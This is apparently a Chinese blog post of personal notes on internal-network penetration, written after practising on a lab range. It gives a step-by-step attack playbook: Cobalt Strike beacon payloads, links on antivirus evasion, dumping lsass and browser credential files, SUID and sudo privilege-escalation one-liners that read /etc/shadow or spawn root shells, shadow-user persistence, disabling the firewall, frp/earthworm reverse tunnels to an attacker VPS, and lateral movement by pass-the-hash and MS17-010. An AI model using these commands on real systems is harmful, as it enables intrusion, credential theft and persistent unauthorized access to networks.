Fork me on GitHub

内网渗透笔记

字数统计: 1.8k字   |   阅读时长≈ 7分

这次用红日的靶场学了一下怎么打内网,写个笔记

内网渗透大概分为几个步骤:

  1. 拿下外网主机
  2. 收集主机信息
  3. 权限提升(不一定需要)
  4. 维持权限
  5. 设置代理进入内网
  6. 搜集内网信息
  7. 横向移动

拿下外网主机

利用漏洞拿到shell

cs上线

  1. 新建监听器

payload选择Beacon Http

http hosts选择自己的服务器IP

HTTP Host (stager)选择自己的服务器IP

(建议做一下C2隐藏https://this-is-y.xyz/2021/07/28/C2%E9%9A%90%E8%97%8F/

  1. attacks -> packages ->payload Generator

监听器选刚刚创建的监听器,output选什么按情况来,一般来说选powershell command,其他语言是在给了exp要你替换shellcode的时候用的

或者选attacks -> packages -> windows executable生成exe文件,直接上传上去执行。

  1. 复制payload,然后命令执行就好了。(有时候可能因为没有powershell或者有杀软给拦住了,奈何不会免杀)

免杀的一些学习文章:

1
2
3
4
5
6
7
8
9
10
11
https://www.secpulse.com/archives/151899.html(这个我同学试过,还是比较好用的,总体思路为多重编码+远程文件加载,但缺点也挺明显的,也过不了内存检测)

https://github.com/TideSec/BypassAntiVirus

https://www.cnblogs.com/Akkuman/p/11851057.html

https://mp.weixin.qq.com/s/VbahKWF_n8aKxKs7mdOLXg

https://mp.weixin.qq.com/s/G1hmsDVTO2208Ymlia_ggQ

https://github.com/aleenzz/Cobalt_Strike_wiki

搜集主机信息

1
2
3
4
5
6
7
8
9
10
11
12
net time /domain #查看时间(判断主域)
net user /domain #查看域用户
net group #查看工作组
net view /domain #查看域列表
systeminfo #系统信息
tasklist #进程列表
ipconfig /all #查看网卡信息,判断内网网段,查询域控IP
%appdata%\Mozilla\Firefox\Profiles\*.defualt\logins.json
%appdata%\Mozilla\Firefox\Profiles\*.defualt\key3.db
%appdata%\Mozilla\Firefox\Profiles\*.defualt\place.sqlite  #火狐浏览器密码、历史记录
arp -a  #看网段
route  #看路由

常见杀软进程:

1
2
3
4
5
6
7
8
9
10
360sd.exe	360杀毒
360tray.exe	360实时保护
ZhuDongFangYu.exe	360主动防御
KSafeTray.exe	金山卫士
SafeDogUpdateCenter.exe	安全狗
McAfee McShield.exe	McAfee
egui.exe	NOD32
AVP.exe	卡巴斯基
avguard.exe	小红伞
bdagent.exe	BitDefender

mimikatz和hashdump读取本机上保存的密码哈希(win10好像用不了了,需要进行魔改)。

无法上传mimikatz工具到目标服务器时,可以利用procdump把lsass进程的内存文件导出本地,再在本地利用mimikatz读取密码procdump64.exe -accepteula -ma lsass.exe lsass.dmp导出为lsass.dump文件

权限提升

Windows下

烂土豆提权(MS16-075)

Linux下

  1. 脏牛提权(uname -a,查看linux版本,在下面的版本就存在漏洞)
1
2
3
4
5
6
7
Centos7/RHEL7     3.10.0-327.36.3.el7
Cetnos6/RHEL6     2.6.32-642.6.2.el6
Ubuntu 16.10      4.8.0-26.28
Ubuntu 16.04      4.4.0-45.66
Ubuntu 14.04      3.13.0-100.147
Debian 8          3.16.36-1+deb8u2
Debian 7          3.2.82-1
  1. suid提权
1
2
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

找到有下面的应用则可以进行提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#Find
find pentestlab -exec whoami \;

#Vim
vim.tiny /etc/shadow

#awk
awk 'BEGIN{system("whoami")}'

#curl
curl file:///etc/shadow

#Bash
bash -p  

#Less
less /etc/passwd

#Nmap
nmap --interactive
  1. 计划任务提权

cat /etc/crontab查看并修改root权限创建的.sh等计划任务

  1. sudo提权

sudo -l查看是否设置了某些命令不需要密码,如下(下面为find命令不需要密码)

1
2
root表示用户名
NOPASSWD 表示不需要输入密码而可以sudo执行的命令

如find命令提权sudo find . -exec /bin/sh \; -quit,python命令提权sudo python -c 'import pty;pty.spawn("/bin/bash")'

维持权限

设置定时任务,dll劫持影子用户等

权限维持及后门持久化技巧总结 - FreeBuf网络安全行业门户

添加影子用户

关闭防火墙:net stop mpssvcnetsh advfirewall set allprofiles state off(生产环境不推荐这么干)

一般来说是添加影子用户,推荐一个小工具ShadowUser

然后开3389就可以登录了

frp端口转发

下载解压之后,将frps放在公网VPS上,修改frps.ini,运行./frps -c ./frps.ini

将frpc放在内网主机上,修改frpc.ini

1
2
3
4
5
6
7
8
9
[common]
server_addr = x.x.x.x #服务器地址
server_port = 7000 #服务器监听端口,和frps.ini一致

[ssh] #服务器名,随便填,下面的参数一致
type = tcp
local_ip = y.y.y.y
local_port = 22
remote_port = 6000 #当访问frp服务端x.x.x.x的6000端口时,等于访问客户端y.y.y.y的22端口

运行./frpc -c ./frpc.ini

再给个关于其他方法进行端口转发的文章

搭建代理

我习惯用earthwormfrp也可以。利用nohup 命令 &可以让他挂在后台运行,要退出则需要用ps -elf查看pid然后用kill命令

ew代理

  1. 正向代理

    1
    a)./ew -s ssocksd -l 8888 # 在 1.1.1.1 主机上通过这个命令开启 8888 端口的 socks 代理

  2. 反向代理

    1
    2
    a) ./ew -s rcsocks -l 1080 -e 8888 # 在 1.1.1.1 的公网主机添加转接隧道,将 1080 收到的代理请求转交给反连 8888 端口的主机
    b) ./ew -s rssocks -d 1.1.1.1 -e 8888 # 将目标网络的可控边界主机反向连接公网主机

    搭建好之后,修改proxychains的配置文件

vim /etc/proxychains.conf

去掉dynamic_chain的注释,在最后一行添加socks5 1.1.1.1 1080

frp代理

和frp转发差不多,就是把东西放上去然后运行就行了,主要看配置

frps.ini

1
2
3
4
[common]
bind_port = 9009
token = thisismyfucktoken
tls_enable = true

frpc.ini

1
2
3
4
5
6
7
8
9
10
11
12
13
[common]
server_addr = x.x.x.x
server_port = 9009
token = thisismyfucktoken

[socks5]
type = tcp
remote_port = 9000
plugin = socks5 #开启socks5插件
use_encryption = true
use_compression = true
tls_enable = true #开启tls加密
dns_server = 8.8.8.8 #可不填

socks5连接选择 x.x.x.x:9000

nps代理

听说的,暂时还没用过

搜集内网信息

fscan一键搜集(实战里别这么玩,fscan流量非常大,而且现在一般都有安全设备,日志会红一大片),建议将fscan改名为java等,进行伪装一下。附赠一个使用指南:

cs中也有进行主机发现的方法。

一般来说都是用arp -a发现网段(route print也可),然后

Windows下

for /L %I in (1,1,254) DO @ping -2 1 -n 1 192.168.52.%I | findstr "TTL="来发现主机或用proxychains nmap来进行扫描(不推荐),也可以用proxychains msfconsole来收集端口或扫描漏洞。nmap和msf中都有漏洞扫描模块。

Linux下

for i in 192.168.111.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i is alived; fi; done

横向移动

利用刚刚收集到的信息攻击内网主机,比如redis未授权(6379)等

IPC$管道(须目标电脑开启SMB服务,具体条件看这个https://mp.weixin.qq.com/s/-SNNLXB_iz8tUmRKMLr6nw

smb登录(新建一个smb listener,选中beacon,右键access->spawn as,选一个跑出来的密码,选smb listener就有了)

直接用跑出来的账号密码登录或者考虑之前的密码进行密码复用或者拿去撞库(暂时这个用的较多)

用ms17_010直接打(msf自带的exp似乎打不了32位的)

哈希传递攻击

结束时木马等文件的清理

建议固定放在某文件夹中,统一清理。ew、frp、mimikatz需要taskkill /f /t /im xxx.exe(windows)或killall xxx.exe(linux)之后再删除

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

CTF菜狗兼混子